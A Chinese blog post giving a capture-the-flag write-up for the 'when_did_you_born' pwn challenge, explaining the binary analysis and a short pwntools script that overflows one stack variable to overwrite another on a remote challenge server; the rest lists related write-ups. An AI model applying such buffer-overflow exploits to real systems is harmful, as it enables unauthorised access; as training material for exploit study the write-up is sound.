when_did_you_born攻防世界pwn

作者: 杰_74 | 来源:发表于2019-08-09 09:39 被阅读0次

when_did_you_born攻防世界pwn
2019-05-30 新手练习区完结
hello_pwn攻防世界pwn
攻防世界 Pwn wp
攻防世界新手练习pwn
攻防世界高手进阶pwn
level3攻防世界pwn
level0攻防世界pwn
cgpwn2攻防世界pwn
level2攻防世界pwn

checksec一下

试运行一下，有两个输入

放入64位IDA

我们输入v5时又不能输入1926，但是下面判断时又要求我们v5为1962，因为v4输入数量不限，所以我们可以利用v4覆盖v5为1926即可

分别点击v4和v5，看到两个地址，v4和v5相差0x20-0x18=0x8。虽然开了Canary，但是v4并不需要覆盖20h那么多，所以并没改变Canary的值

写脚本

#coding=utf8
from pwn import *
context.log_level = 'debug'
p = remote('111.198.29.45',39014)

p.sendline('2000')
p.recvuntil("What's Your Name?")

payload = ''
payload += 0x8*'A'
payload += p64(1926)

p.sendline(payload)

p.interactive()

when_did_you_born攻防世界pwn
checksec一下试运行一下，有两个输入放入64位IDA 我们输入v5时又不能输入1926，但是下面判断时又...
2019-05-30 新手练习区完结
至此攻防世界的pwn新手练习区完结了
hello_pwn攻防世界pwn
checksec然后试运行放入64位ida，看看main函数点击read函数里的unk_601068，再点击i...
攻防世界 Pwn wp
0x01get_shell 下载附件后直接丢IDA F5 0x02CGfsb 先用checksec查看开了哪些保护...
攻防世界新手练习pwn
0x00 get_shell 0x01 CGfsb 首先检查保护 nc连接输入信息为aaaa加很多个控制字符发现p...
攻防世界高手进阶pwn
歇了很长一段时间，终于开始了我的攻防世界pwn之路。立一个flag：每日一题，只能多不能少。 0x00 dice_...
level3攻防世界pwn
checksec level3./level3 ida，无system无binsh，要通过泄露write函数来泄露...
level0攻防世界pwn
checksec然后试运行放入64位IDA，F5大法发现callsystem函数找到callsystem的地...
cgpwn2攻防世界pwn
checksec后试运行，有两个输入 32位ida 点进去hello() 可以利用fgets和gets栈溢出发现...
level2攻防世界pwn
checksec后试运行放入64位ida 发现system，但参数不对，那我们shift+F12查看字符串，发现...